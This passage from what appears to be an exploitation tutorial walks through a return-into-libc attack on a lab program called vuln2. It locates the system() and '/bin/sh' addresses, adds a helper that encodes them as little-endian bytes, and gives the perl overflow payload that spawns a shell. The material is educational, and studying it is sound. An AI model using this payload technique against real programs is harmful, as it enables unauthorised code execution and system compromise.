Once the system() function is located, the memory is searched in
both directions, looking for the existence of the "/bin/sh" string. The "/bin/sh" string can be
found embedded in glibc, which in this case keeps the attacker from depending on access to
environment variables to complete the attack. Finally, the value is checked to see if it contains
a NULL byte and the location is printed. You may customize the preceding program to
look for other objects and strings. Let's compile the preceding program and test-drive it.
BT book $
BT book $ gcc -o search -ldl search.c
BT book $ ./search
system() found at b7ed86e0
exit() found at b7ece3a0
"/bin/sh" found at b7fc04c7
A quick check of the preceding gdb value shows the same location for the system() function;
success!
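The three addresses printed by ./search are useful only if none of them contains a 0x00 byte (a string-copy overflow stops at the first NULL) and only once they are written in little-endian order. The following added program, not part of the book's search.c, performs that NULL-byte check on the page's values and shows how 0xb7ed86e0 becomes the "\xe0\x86\xed\xb7" escape used on the command line; the three addresses are taken from the output above.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Return true if any byte of the 32-bit address is 0x00. A NULL byte
   terminates a str*-style copy, so such an address could not be delivered
   intact by a string-copy overflow; this is the check search.c performs. */
bool has_null_byte(uint32_t addr) {
    for (int i = 0; i < 4; i++) {
        if (((addr >> (8 * i)) & 0xff) == 0)
            return true;
    }
    return false;
}

/* Write addr as 4 little-endian bytes, the order an x86 stack frame holds
   a saved return address in (least significant byte first). */
void to_le_bytes(uint32_t addr, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xff);
}

/* Inverse: read 4 little-endian bytes back as an address. */
uint32_t from_le_bytes(const unsigned char in[4]) {
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
           ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

int main(void) {
    /* Addresses reported by ./search on this page. */
    const uint32_t addrs[] = { 0xb7ed86e0, 0xb7ece3a0, 0xb7fc04c7 };
    const char *names[] = { "system()", "exit()", "\"/bin/sh\"" };
    for (int i = 0; i < 3; i++) {
        unsigned char b[4];
        to_le_bytes(addrs[i], b);
        printf("%-10s %08x  null byte: %-3s  bytes: \\x%02x\\x%02x\\x%02x\\x%02x\n",
               names[i], addrs[i], has_null_byte(addrs[i]) ? "yes" : "no",
               b[0], b[1], b[2], b[3]);
    }
    return 0;
}
```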
We now have everything required to successfully attack the vulnerable program using
the return into libc exploit. Putting it all together, we see
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
"\xe0\x86\xed\xb7","BBBB","\xc7\x04\xfc\xb7"'`
sh-3.1$ id
uid=1001(joe) gid=100(users) groups=100(users)
sh-3.1$ exit
exit
Segmentation fault
BT book $
Notice that we got a user-level shell (not root) and that when we exited from the shell, we got
a segmentation fault.